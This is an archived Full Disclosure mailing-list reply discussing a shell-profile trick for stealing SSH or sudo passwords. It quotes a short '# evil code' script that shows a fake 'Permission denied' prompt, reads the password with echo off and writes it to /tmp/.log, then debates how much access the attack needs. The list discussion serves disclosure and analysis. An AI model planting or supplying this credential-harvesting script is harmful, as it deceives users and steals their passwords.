Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: PuTTY private key passphrase stealing attack
From: Joachim Schipper <joachim () joachimschipper nl>
Date: Wed, 2 Jun 2010 21:41:28 +0200

On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote:
all controls like MOTD can be bypassed ...

=========edited script=====
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
mSttyVal=`stty -g`
echo -en "Permission denied, please try again.\n"
echo -en "$mUn () $mIP's password:"
stty -echo
read password
echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log
echo -en "\n"
stty $mSttyVal
==================end snippet========

Apart from this, we already need to have root access to replace any .bashrc
file ... this is not really an attack but a social engineering attack ....
if we had root access we could attach sshd to the strace and get any
password etc all details ....

But note that someone with access to a single account could use this to
gain the password for that account, and hence possibly sudo access.

It's a bit of a stretch, but not impossible.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]